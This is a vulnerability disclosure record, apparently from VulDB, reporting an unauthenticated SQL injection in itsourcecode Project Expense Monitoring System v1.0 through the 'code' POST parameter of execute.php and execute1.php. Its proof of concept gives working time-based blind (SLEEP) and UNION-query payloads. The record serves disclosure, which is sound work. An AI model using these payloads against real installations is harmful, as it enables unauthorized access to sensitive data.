| Title | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|---|
| Description | Attackers do not need to log in to the backend. They can pass in the code parameter in the execute.php and execute1.php pages and construct special SQL statements to carry out SQL injection attacks to obtain sensitive data.<br>POC:<br>Parameter: code (POST)<br>Type: time-based blind<br>Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br>Payload: `code=1' AND (SELECT 3055 FROM (SELECT(SLEEP(5)))qdgV) AND 'wCrt'='wCrt`<br>Type: UNION query<br>Title: Generic UNION query (NULL) - 8 columns<br>Payload: `code=1' UNION ALL SELECT NULL,CONCAT(0x717a717071,0x6a5158484166616e41746e696241666561674a53525661626877575a6f426454534d69745359456c,0x71786a7171),NULL,NULL,NULL,NULL,NULL,NULL-- -` |
| Source | https://github.com/DeepMountains/zzz/blob/main/CVE3-2.md |
| User | GUOTINGTING (UID 73614) |
| Submitted | 2024-08-17 02:14 PM (2 years ago) |
| Moderated | 2024-08-19 04:12 PM (2 days later) |
| Status | Accepted |
| VulDB entry | 275119 [itsourcecode Project Expense Monitoring System 1.0 execute.php SQL injection] |
| Points | 20 |